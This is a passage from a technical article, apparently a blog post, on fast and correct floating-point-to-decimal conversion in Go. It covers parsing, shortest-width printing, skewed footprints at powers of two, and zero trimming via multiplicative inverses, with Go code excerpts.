find <math><mi>p</mi></math>; then <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>m</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> converts binary to decimal.
In parsing, we are given <math><mi>d</mi></math>, <math><mi>p</mi></math> and find <math><mi>e</mi></math>;
then <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>d</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> converts decimal to binary.
<p>
We can make parsing a little faster with a few hand optimizations.
This optimized version introduces <code>lp</code> to avoid calling <code>log2Pow10</code> twice,
and it implements the extra digit handling in branch-free code.
<div class=showcode><pre><span class=showcode-comment>// Parse rounds d * 10**p to the nearest float64 f.</span>
<span class=showcode-comment>// d can have at most 19 digits.</span>
func Parse(d uint64, p int) float64 {
if d > 1e19 {
panic("too many digits")
}
b := bits.Len64(d)
lp := log2Pow10(p)
e := min(1074, 53-b-lp)
u := uscale(d<<(64-b), prescale(e-(64-b), p, lp))
<span class=showcode-comment>// This block is branch-free code for:</span>
<span class=showcode-comment>// if u.round() >= 1<<53 {</span>
<span class=showcode-comment>// u = u.rsh(1)</span>
<span class=showcode-comment>// e = e - 1</span>
<span class=showcode-comment>// }</span>
s := bool2[int](u >= unmin(1<<53))
u = (u >> s) | u&1
e = e - s
return pack64(u.round(), -e)
}
<span class=showcode-comment>// unmin returns the minimum unrounded that rounds to x.</span>
func unmin(x uint64) unrounded {
return unrounded(x<<2 - 2)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L112-L137">fpfmt/fpfmt.go:112,137</a></div><div class=showcode-end></div>
<p>
Now we are ready for our next challenge: shortest-width printing.
<a class=anchor href="#shortest-width_printing"><h2 id="shortest-width_printing">Shortest-Width Printing</h2></a>
<p>
Shortest-width printing means to prepare a decimal representation
that a floating-point parser would convert back to the exact same <code>float64</code>,
using as few digits as possible.
When there are multiple possible shortest decimal outputs,
we insist on the one that is nearest the original input,
namely the correctly-rounded one.
In general, 17 digits are always enough to uniquely identify a <code>float64</code>,
but sometimes fewer can be used, even down to a single digit in numbers like 1, 2e10, and 3e−42.
<p>
An obvious approach would be to use <code>FixedPrint</code> for increasing values of <code>n</code>,
stopping when <code>Parse(FixedPrint(f, n)) == f</code>.
Or maybe we should derive an equation for <code>n</code> and then use <code>FixedPrint(f, n)</code> directly.
Surprisingly, neither approach works:
<code>Short(f)</code> is not necessarily <code>FixedPrint(f, n)</code> for some <code>n</code>.
The simplest demonstration of this is <math><mrow><mi>f</mi><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>89</mn></msup><mo>=</mo><mn>6189700196426901</mn><mspace width='0.166em' /><mn>37449562112</mn><mo>=</mo><mtext><code>0x10000000000000</code></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>37</mn></msup></mrow></math>,
which looks like this:
<p>
<img name="fpfmt-ruler-skew" class="center pad" width=370 height=190 src="fpfmt-ruler-skew.svg">
<p>
Because <math><mi>f</mi></math> is a power of two, the floating-point exponent
changes at <math><mi>f</mi></math>,
as does the spacing between floating-point numbers.
The next smallest value is <math><mrow><mtext><code>0x1ffffffffffff</code></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>38</mn></mrow></msup></mrow></math>,
marked on the diagram as <math><mrow><mtext><code>0xffffffffffff½</code></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>37</mn></mrow></msup></mrow></math>.
The dotted lines mark the halfway points between <math><mi>f</mi></math>
and its nearest floating point neighbors.
The accurate decimal answers are those at or between the dotted lines,
all of which convert back to <math><mi>f</mi></math>.
<p>
The correct rounding of <math><mi>f</mi></math> to 16 digits ends in …901: the next digit in <math><mi>f</mi></math> is 3,
so we should round down.
However, because of the spacing change around <math><mi>f</mi></math>,
that correct decimal rounding does not convert back to <math><mi>f</mi></math>.
A <code>FixedPrint</code> loop would choose a 17-digit form instead.
But there is an accurate 16-digit form, namely …902.
That decimal is closer to <math><mi>f</mi></math> than it is to any other float64,
making it an accurate <math><mi>d</mi></math>.
And since the closer 16-digit value …901 is not an accurate <math><mi>d</mi></math>,
<code>Short</code> should use …902 instead.
<p>
Assuming as usual that <math><mrow><mi>f</mi><mo>=</mo><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>,
let’s define
<math><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo></mrow></math>
to be the distance between the midpoints from <math><mi>f</mi></math> to its
floating-point neighbors.
Normally those neighbors are <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>
in either direction—the midpoints are <math><mrow><mo stretchy=false>(</mo><mi>m</mi><mo>±</mo><mn>½</mn><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>—so
<math><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>.
At a power of two with an exponent change,
the lower midpoint is instead <math><mrow><mo stretchy=false>(</mo><mi>m</mi><mo>−</mo><mn>¼</mn><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>,
so <math><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>=</mo><mn>¾</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>.
The rounding paradox can only happen for powers of two
with this kind of skewed footprint.
<p>
All that is to say we cannot use <code>FixedWidth</code> with “the right <math><mi>n</mi></math>”.
But we can use scale directly with “the right <math><mi>p</mi></math>.”
Specifically, we can compute the midpoints between <math><mi>f</mi></math>
and its floating-point neighbors
and scale them to obtain the
minimum and maximum valid choices for <math><mi>d</mi></math>.
Then we can make the best choice:
<ul>
<li>
If one of the valid <math><mi>d</mi></math> ends in 0, use it after removing trailing zeros. <br>
(Choosing the right <math><mi>p</mi></math> will allow at most ten consecutive integers,
so at most will one end in 0.)
<li>
If there is only one valid <math><mi>d</mi></math>, use it.
<li>
Otherwise there are at least two valid <math><mi>d</mi></math>, at least one on each side of <math><mi>f</mi></math>;
use the correctly rounded one.</ul>
<p>
Here is an example of the first case: one of the valid <math><mi>d</mi></math> ends in zero.
<p>
<img name="fpfmt-ruler-trimzero" class="center pad" width=370 height=190 src="fpfmt-ruler-trimzero.svg">
<p>
We already saw an example of the second case: only one valid <math><mi>d</mi></math>.
For numbers with symmetric footprints, that will be the
correctly rounded <math><mi>d</mi></math>.
As we saw for numbers with skewed footprints,
that may not be the correctly rounded <math><mi>d</mi></math>,
but it is still the correct answer.
<p>
Finally, here is an example of the third case: multiple valid <math><mi>d</mi></math>,
but none that end in zero.
Now we should use the correctly rounded one.
<p>
<img name="fpfmt-ruler-many" class="center pad" width=370 height=190 src="fpfmt-ruler-many.svg">
<p>
This sounds great, but how do we determine the right <math><mi>p</mi></math>?
We want <math><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo></mrow></math> to allow at least one decimal integer,
but at most ten, meaning <math><mrow><mn>1</mn><mo>≤</mo><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo><</mo><mn>10</mn></mrow></math>.
Luckily, we can hit that target exactly.
<p>
For a symmetric footprint:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd><mrow></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mn>1/2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[isolating</mtext><mspace width='0.3em' /></mrow><mi>p</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo>)</mo></mrow><mo>·</mo><mi>e</mi><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[taking</mtext><mspace width='0.3em' /><mtext>log]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>(</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>−</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo><mo>)</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[regrouping]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>⌊</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mi>p</mi><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr></mtable></math></div>
<p>
For a skewed footprint:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mn>¾</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mtext>footprint</mtext><mo stretchy=false>(</mo><mi>f</mi><mo stretchy=false>)</mo><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mn>1/</mn><mo stretchy=false>(</mo><mn>¾</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[isolating</mtext><mspace width='0.3em' /></mrow><mi>p</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>¾</mn><mo>+</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>)</mo></mrow><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[taking</mtext><mspace width='0.3em' /><mtext>log]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>¾</mn><mo>+</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>−</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo><mo>)</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[regrouping]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>¾</mn><mo>+</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mi>p</mi><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr></mtable></math></div>
<p>
For the symmetric footprint, we can use <code>log10Pow2</code>,
but for the skewed footprint, we need a new approximation:
<div class=showcode><pre><span class=showcode-comment>// skewed computes the skewed footprint of m * 2**e,</span>
<span class=showcode-comment>// which is ⌊log₁₀ 3/4 * 2**e⌋ = ⌊e*(log₁₀ 2)-(log₁₀ 4/3)⌋.</span>
func skewed(e int) int {
return (e*631305 - 261663) >> 21
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L234-L237">fpfmt/fpfmt.go:234,237</a></div><div class=showcode-end></div>
<p>
We should worry about a footprint with decimal width exactly 1,
since if <math><mi>f</mi></math> had an odd mantissa,
the midpoints would be excluded.
In that case, if the decimals were the exact midpoints,
there would be no decimal between them,
making the conversion invalid.
But it turns out we should not worry too much.
For a skewed footprint, <math><mrow><mn>¾</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> can never be exactly 1,
because nothing can divide away the 3.
For a symmetric footprint, <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>=</mo><mn>1</mn></mrow></math>
can only happen for <math><mrow><mi>e</mi><mo>=</mo><mi>p</mi><mo>=</mo><mn>0</mn></mrow></math>,
but then scaling is a no-op,
so that the decimal integers are exactly the binary integers.
The non-integer midpoints map to non-integer decimals.
<p>
When we compute the decimal equivalents of the midpoints,
we will use ceiling and floor instead of rounding them,
to make sure the integer results are valid decimal answers.
If the mantissa <math><mi>m</mi></math> is odd, we will nudge the unrounded forms
inward slightly before taking the ceiling or floor,
since rounding will be away from <math><mi>m</mi></math>.
<p>
The Go code is:
<div class=showcode><pre><span class=showcode-comment>// Short computes the shortest formatting of f,</span>
<span class=showcode-comment>// using as few digits as possible that will still round trip</span>
<span class=showcode-comment>// back to the original float64.</span>
func Short(f float64) (d uint64, p int) {
const minExp = -1085
m, e := unpack64(f)
var min uint64
z := 11 <span class=showcode-comment>// extra zero bits at bottom of m; 11 for 53-bit m</span>
if m == 1<<63 && e > minExp {
p = -skewed(e + z)
min = m - 1<<(z-2) <span class=showcode-comment>// min = m - 1/4 * 2**(e+z)</span>
} else {
if e < minExp {
z = 11 + (minExp - e)
}
p = -log10Pow2(e + z)
min = m - 1<<(z-1) <span class=showcode-comment>// min = m - 1/2 * 2**(e+z)</span>
}
max := m + 1<<(z-1) <span class=showcode-comment>// max = m + 1/2 * 2**(e+z)</span>
odd := int(m>>z) & 1
pre := prescale(e, p, log2Pow10(p))
dmin := uscale(min, pre).nudge(+odd).ceil()
dmax := uscale(max, pre).nudge(-odd).floor()
if d = dmax / 10; d*10 >= dmin {
return trimZeros(d, -(p - 1))
}
if d = dmin; d < dmax {
d = uscale(m, pre).round()
}
return d, -p
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L198-L231">fpfmt/fpfmt.go:198,231</a></div><div class=showcode-end></div>
<p>
Notice that this algorithm requires either two or three calls to <code>uscale</code>.
When the number being printed has only one valid representation
of the shortest length, we avoid the third call to <code>uscale</code>.
Also notice that the <code>prescale</code> result is shared by all three calls.
<p>
When <math><mrow><mi>m</mi><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup></mrow></math>, <math><mrow><mtext><i>min</i></mtext><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup></mrow></math>,
meaning it won’t be left shifted as far as possible
during the call to <code>uscale</code>.
Although we could detect this case and call <code>uscale</code>
with <math><mrow><mn>2</mn><mo>·</mo><mtext><i>min</i></mtext></mrow></math> and <math><mrow><mi>e</mi><mo>−</mo><mn>1</mn></mrow></math>,
using <math><mtext><i>min</i></mtext></math> unmodified is fine:
it is still shifted enough that the bits <code>uscale</code>
needs to return will stay in the high 64 bits of the 192-bit product,
and using the same <math><mi>e</mi></math>
lets us use the same <code>prescale</code> work for all three calls.
<a class=anchor href="#trimzero"><h3 id="trimzero">Trimming Zeros</h3></a>
<p>
The <code>trimZeros</code> function used in <code>Short</code> removes any trailing zeros from its argument,
updating the decimal power. An unoptimized version is:
<div class=showcode><pre><span class=showcode-comment>// trimZeros removes trailing zeros from x * 10**p.</span>
<span class=showcode-comment>// If x ends in k zeros, trimZeros returns x/10**k, p+k.</span>
<span class=showcode-comment>// It assumes that x ends in at most 16 zeros.</span>
func trimZeros(x uint64, p int) (uint64, int) {
if x%10 != 0 {
return x, p
}
x /= 10
p += 1
if x%100000000 == 0 {
x /= 100000000
p += 8
}
if x%10000 == 0 {
x /= 10000
p += 4
}
if x%100 == 0 {
x /= 100
p += 2
}
if x%10 == 0 {
x /= 10
p += 1
}
return x, p
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L227-L253">fpfmt/unopt/fpfmt.go:227,253</a></div><div class=showcode-end></div>
<p>
The initial removal of a single zero gives an early return for
the common case of having no zeros.
Otherwise, the code makes four additional checks that
collectively remove up to 16 more zeros.
For outputs with many zeros, these four checks run faster
than a loop removing one zero at a time.
<p>
When compiling this code,
the Go compiler reduces the remainder checks to multiplications
using the following well-known optimization.
An exact <code>uint64</code> division <math><mrow><mi>x</mi><mn>/</mn><mi>c</mi></mrow></math> where <math><mrow><mi>x</mi><MO>mod</MO><mi>c</mi><mo>=</mo><mn>0</mn></mrow></math>
can be implemented by <math><mrow><mi>x</mi><mo>·</mo><mi>m</mi></mrow></math> where <math><mi>m</mi></math>
is the <code>uint64</code> multiplicative inverse of <math><mi>c</mi></math>, meaning <math><mrow><mi>m</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>=</mo><mn>1</mn></mrow></math>:
Since <math><mi>c</mi></math> is also the multiplicative inverse of <math><mi>m</mi></math>, <math><mrow><mi>x</mi><mo>·</mo><mi>m</mi></mrow></math> is
lossless—all the exact multiples of <math><mi>c</mi></math> map to all of <math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><MO>/</MO><mi>c</mi><mo stretchy=false>]</mo></mrow></math>—so
the non-multiples are forced to map to larger values.
This observation gives a quick test for whether <math><mi>x</mi></math> is an exact multiple of <math><mi>c</mi></math>:
check whether <math><mrow><mi>x</mi><mo>·</mo><mi>m</mi><mo>≤</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><MO>/</MO><mi>c</mi></mrow></math>.
<p>
Only odd <math><mi>c</mi></math> have multiplicative inverses modulo powers of two,
so even divisors require more work.
To compute an exact division <math><mrow><mi>x</mi><MO>/</MO><mo stretchy=false>(</mo><mi>c</mi><MO><<</MO><mi>s</mi><mo stretchy=false>)</mo></mrow></math>,
we can use <math><mrow><mo stretchy=false>(</mo><mi>x</mi><mn>/</mn><mi>c</mi><mo stretchy=false>)</mo><MO>>></MO><mi>s</mi></mrow></math> instead.
To check for remainder, we need to check that those low <math><mi>s</mi></math>
bits are all zero before we shift them away.
We can merge that check with the range check by rotating those bits
into the high part instead of discarding them:
check whether <math><mrow><mi>x</mi><mo>·</mo><mi>m</mi><MO>↻></MO><mi>s</mi><mo>≤</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><MO>/</MO><mi>c</mi></mrow></math>,
where <math><MO lspace='0' rspace='0'>↻></MO></math> is right rotate.
<p>
The Go compiler does this transformation automatically
for the <code>if</code> conditions in <code>trimZeros</code>,
but inside the <code>if</code> bodies, it does not reuse the
exact quotient it just computed.
I considered changing the compiler to recognize that pattern,
but instead I wrote out the remainder check by hand
in the optimized version, allowing me to reuse the computed exact quotients:
<div class=showcode><pre><span class=showcode-comment>// trimZeros removes trailing zeros from x * 10**p.</span>
<span class=showcode-comment>// If x ends in k zeros, trimZeros returns x/10**k, p+k.</span>
<span class=showcode-comment>// It assumes that x ends in at most 16 zeros.</span>
func trimZeros(x uint64, p int) (uint64, int) {
const (
maxUint64 = ^uint64(0)
inv5p8 = 0xc767074b22e90e21 <span class=showcode-comment>// inverse of 5**8</span>
inv5p4 = 0xd288ce703afb7e91 <span class=showcode-comment>// inverse of 5**4</span>
inv5p2 = 0x8f5c28f5c28f5c29 <span class=showcode-comment>// inverse of 5**2</span>
inv5 = 0xcccccccccccccccd <span class=showcode-comment>// inverse of 5</span>
)
<span class=showcode-comment>// Cut 1 zero, or else return.</span>
if d := bits.RotateLeft64(x*inv5, -1); d <= maxUint64/10 {
x = d
p += 1
} else {
return x, p
}
<span class=showcode-comment>// Cut 8 zeros, then 4, then 2, then 1.</span>
if d := bits.RotateLeft64(x*inv5p8, -8); d <= maxUint64/100000000 {
x = d
p += 8
}
if d := bits.RotateLeft64(x*inv5p4, -4); d <= maxUint64/10000 {
x = d
p += 4
}
if d := bits.RotateLeft64(x*inv5p2, -2); d <= maxUint64/100 {
x = d
p += 2
}
if d := bits.RotateLeft64(x*inv5, -1); d <= maxUint64/10 {
x = d
p += 1
}
return x, p
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L240-L277">fpfmt/fpfmt.go:240,277</a></div><div class=showcode-end></div>
<p>
This approach to trimming zeros is from Dragonbox.
For more about the general optimization,
see Warren’s <i>Hacker’s Delight</i> [<a class=footref id='fnref-34' href='#fn-34'>34</a>],
sections 10-16 and 10-17.
<a class=anchor href="#fast_accurate_scaling"><h2 id="fast_accurate_scaling">Fast, Accurate Scaling</h2></a>
<p>
The conversion algorithms we examined are nice and simple.
For them to be fast, <code>uscale</code> needs to be fast while remaining correct.
Although multiplication by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math> can be implemented by shifts,
<code>uscale</code> cannot actually compute or multiply by
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>—that would take too long when <math><mi>p</mi></math> is a large positive or negative number.
Instead, we can approximate <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> as a floating-point number <math><mrow><mtext><i>pm</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup></mrow></math> with a 128-bit mantissa,
looked up in a table indexed by <math><mi>p</mi></math>.
Specifically, we will use <math><mrow><mtext><i>pe</i></mtext><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>−</mo><mn>127</mn></mrow></math> and <math><mrow><mtext><i>pm</i></mtext><mo>=</mo><mrow><mo stretchy=false>⌈</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup><mo stretchy=false>⌉</mo></mrow></mrow></math>,
ensuring that <math><mrow><mtext><i>pm</i></mtext><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>127</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>128</mn></msup><mo stretchy=false>)</mo></mrow></math>.
We will write a separate program to generate this table.
It emits Go code defining <code>pow10Min</code>, <code>pow10Max</code>, and <code>pow10Tab</code>:
<code>pow10Tab[0]</code> holds the entry for <math><mrow><mi>p</mi><mo>=</mo><mtext><code>pow10Min</code></mtext></mrow></math>.
To figure out how big the table needs to be,
we can analyze the three functions we just wrote.
<ul>
<li>
<code>FixedWidth</code> converts floating-point to decimal.
It needs to call <code>uscale</code> with a 53-bit <math><mi>x</mi></math>, <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1137</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>307</mn><mo>,</mo><mn>341</mn><mo stretchy=false>]</mo></mrow></math>.
<li>
<code>Short</code> also converts floating-point to decimal.
